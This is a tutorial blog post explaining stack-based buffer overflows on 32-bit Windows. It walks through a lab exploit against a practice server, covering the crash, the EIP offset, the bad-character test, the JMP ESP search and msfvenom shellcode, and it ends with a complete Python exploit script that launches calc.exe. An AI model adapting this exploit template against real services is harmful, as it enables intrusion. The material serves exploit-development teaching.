Understanding & Exploiting stack based Buffer Overflows

Sourov Ghosh
6 min readJan 16, 2020

Overview

Stack-based buffer overflow exploits are likely the shiniest and most common form of exploit for remotely taking over the code execution of a process. These exploits were extremely common 20 years ago, but since then, a huge amount of effort has gone into mitigating stack-based overflow attacks by operating system developers, application developers, and hardware manufacturers, with changes even being made to the standard libraries developers use.

What is a buffer?

Arrays allocate storage space in what is called a buffer.

Syntax: type array[buffer_length];

Example:

char input[50]; // An array of up to 50 characters.
char c = input [49] // max
char c= input [250] // accessing memory outside the array

Memory Layout

Credits: GeeksforGeeks

The Stack

The stack is a piece of the process memory, a data structure that works LIFO (Last in first out). A stack gets allocated by the OS, for each thread (when the thread is created). When the thread ends, the stack is cleared as well. The size of the stack is defined when it gets created and doesn’t change.

Source: Wikipedia

A stack frame is a frame of data that gets pushed onto the stack. In the case of a call stack, a stack frame would represent a function call and its argument data. The function return address is pushed onto the stack first, then the arguments and space for local variables.

Registers

  • EAX: Accumulator used for performing calculations, and used to store return values from function calls. Basic operations such as add, subtract, compare use this general-purpose register
  • EBX: Base (does not have anything to do with base pointer). It has no general-purpose and can be used to store data.
  • ECX: Counter used for iterations. ECX counts downward.
  • EDX: Data this is an extension of the EAX register. It allows for more complex calculations (multiply, divide) by allowing extra data to be stored to facilitate those calculations.
  • ESP: Stack pointer
  • EBP: Base pointer
  • ESI: Source Index holds the location of input data
  • EDI: Destination Index points to the location where the result of data operation is stored
  • EIP: Instruction Pointer

How do we Exploit This?

Credits: Acunetix

We can feed any memory address within the stack into the EIP (return address). The program will execute instructions at that memory address. We can put our shellcode into the stack and put the address to the start of the shellcode at the EIP, and the program will execute the shellcode.

The Actual Hack

  1. Write past array buffer ending and overwriting EIP register to crash the program.
  2. Find the offset of the payload after which the EIP is overwritten.
  3. Find and remove bad characters.
  4. Find the address of the JMP ESP opcode so that program flow can be redirected to the stack.
  5. Overwrite return address at EIP with the address of JMP ESP.
  6. Generate the payload and exploit the program.

Exploiting

Crashing the program

We create a long string using the command python -c "print 'A'*300" and then send it as input to the server.

Crashed application

We restart the application with Immunity Debugger attached and send the same payload once more. We can see that the application crashed and the EIP register is overwritten with 41 (A in hexadecimal).

Finding Offset

Now that we know that we can overwrite the EIP register we need to find out the exact number of bytes in the payload after which the EIP gets overwritten. To find this we use a tool called msf-pattern_create to create a unique non-repeating string and send it as a payload. After the application crashes, we note the value of EIP and use msf-pattern_offset to calculate the exact value.

Using pattern_create and pattern_offset to find the offset
EIP register overwritten with the payload generated by pattern_create

Finding bad characters

Certain byte characters can cause issues in the development of exploits. By default, the null byte(x00) is always considered a bad character as it will truncate shellcode when executed. To find bad characters, we can add a variable of “bad chars” to our code that contains a list of every single hex character. \x00 and \x0A are NULL and Carriage Return, well known bad characters so we remove them before testing and add them to our bad characters list. You can find an easy copy/paste of the variable here):

import sys, socket, time

host = "192.168.0.107"
port = 31337
char = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# EIP Writing Pattern
pattern = "A"*146 + "BBBB" + char + "\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)
# print out what we received
print "Received: {0}".format(data)
client.close() # Close the Connection

After sending this we check the value of the stack (right-click on the ESP register and select Follow in Dump option).

We can verify that EIP is under our control
The characters that we have sent as input are all present

As all the characters that we have sent are present, we can confirm that there is no bad character other than \x00 and \x0A. If there was a bad character it would have been replaced with B0 or the list would have been truncated.

Example of a program with lots of bad characters. Not a part of this exploit.

Finding JMP ESP

Now that we have control over the EIP register we need it to somehow point it to the ESP register so that it will start executing the contents of the stack. The JMP ESP command does the same thing. When JMP ESP command is executed it jumps to ESP. We can find out the location of JMP ESP using the following ways:

  1. !mona find -s “\\xff\\xe4”
  2. !mona jmp -r esp

In this case, we have two modules which satisfy our requirement. We will use the address 0x080416BF in our exploit. We need to convert this address to little-endian format which is ‘\xBF\x16\x04\x08’ to use it in our code.

Game Over

We generate shellcode using msfvenom and use the generated shellcode in our final exploit.

msfvenom -p windows/exec -b ‘\x00\x0A’ -f python CMD=calc.exe EXITFUNC=thread

The final exploit code

import sys, socket, timehost = "192.168.0.107"
port = 31337
#badchar '0x00, 0x0A'
shellcode_calc = ""
shellcode_calc += "\xb8\x3e\x08\xbf\x9c\xdb\xdc\xd9\x74\x24"
shellcode_calc += "\xf4\x5f\x29\xc9\xb1\x31\x31\x47\x13\x03"
shellcode_calc += "\x47\x13\x83\xc7\x3a\xea\x4a\x60\xaa\x68"
shellcode_calc += "\xb4\x99\x2a\x0d\x3c\x7c\x1b\x0d\x5a\xf4"
shellcode_calc += "\x0b\xbd\x28\x58\xa7\x36\x7c\x49\x3c\x3a"
shellcode_calc += "\xa9\x7e\xf5\xf1\x8f\xb1\x06\xa9\xec\xd0"
shellcode_calc += "\x84\xb0\x20\x33\xb5\x7a\x35\x32\xf2\x67"
shellcode_calc += "\xb4\x66\xab\xec\x6b\x97\xd8\xb9\xb7\x1c"
shellcode_calc += "\x92\x2c\xb0\xc1\x62\x4e\x91\x57\xf9\x09"
shellcode_calc += "\x31\x59\x2e\x22\x78\x41\x33\x0f\x32\xfa"
shellcode_calc += "\x87\xfb\xc5\x2a\xd6\x04\x69\x13\xd7\xf6"
shellcode_calc += "\x73\x53\xdf\xe8\x01\xad\x1c\x94\x11\x6a"
shellcode_calc += "\x5f\x42\x97\x69\xc7\x01\x0f\x56\xf6\xc6"
shellcode_calc += "\xd6\x1d\xf4\xa3\x9d\x7a\x18\x35\x71\xf1"
shellcode_calc += "\x24\xbe\x74\xd6\xad\x84\x52\xf2\xf6\x5f"
shellcode_calc += "\xfa\xa3\x52\x31\x03\xb3\x3d\xee\xa1\xbf"
shellcode_calc += "\xd3\xfb\xdb\x9d\xb9\xfa\x6e\x98\x8f\xfd"
shellcode_calc += "\x70\xa3\xbf\x95\x41\x28\x50\xe1\x5d\xfb"
shellcode_calc += "\x15\x0d\xbc\x2e\x63\xa6\x19\xbb\xce\xab"
shellcode_calc += "\x99\x11\x0c\xd2\x19\x90\xec\x21\x01\xd1"
shellcode_calc += "\xe9\x6e\x85\x09\x83\xff\x60\x2e\x30\xff"
shellcode_calc += "\xa0\x4d\xd7\x93\x29\xbc\x72\x14\xcb\xc0"
ret = '\xBF\x16\x04\x08' # Packed in little endian# EIP Writing Pattern
pattern = "A"*146 + ret + "\x90"*16+ shellcode_calc + "\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)
print "Received: {0}".format(data)
client.close()

Now we restart the program and run the exploit code. On our windows machine, we see that calculator application has opened.

References & Resources

  1. https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  2. https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md
  3. https://www.fuzzysecurity.com/tutorials/expDev/1.html
  4. https://www.youtube.com/watch?v=qSnPayW6F7U
  5. https://www.geeksforgeeks.org/memory-layout-of-c-program/
  6. https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
  7. https://www.acunetix.com/blog/web-security-zone/what-is-buffer-overflow/

--

--